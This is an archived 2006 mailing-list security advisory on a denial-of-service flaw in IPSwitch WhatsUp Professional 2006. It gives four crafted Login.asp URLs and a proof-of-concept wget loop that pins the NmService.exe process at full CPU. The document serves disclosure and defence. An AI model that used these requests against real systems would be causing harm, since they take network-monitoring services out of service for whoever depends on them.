lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed Feb 22 16:54:20 2006 From: jzlatin at ramat.cc (Josh Zlatin) Subject: IpSwitch WhatsUp Professional 2006 DoS Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw Product: IPSwitch WhatsUp http://www.ipswitch.com Version: Confirmed on WhatsUp Professional 2006 Author: Josh Zlatin-Amishav Date: February 22, 2006 Background: WhatsUp Professional 2006 is application and network management that keeps your critical business technology, like email servers and databases, working efficiently so you can run your business. Issue: The NmService.exe executable does not handle certain requests properly. The following URLs can be used to create a DoS condition due to the NmService using 100% CPU http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName= http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword= http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn= http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]= PoC: while [ 1 ]; do wget -O /dev/null http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=; done References: http://www.ipswitch.com http://zur.homelinux.com/Advisories/ipswitch_dos.txt
Powered by blists - more mailing lists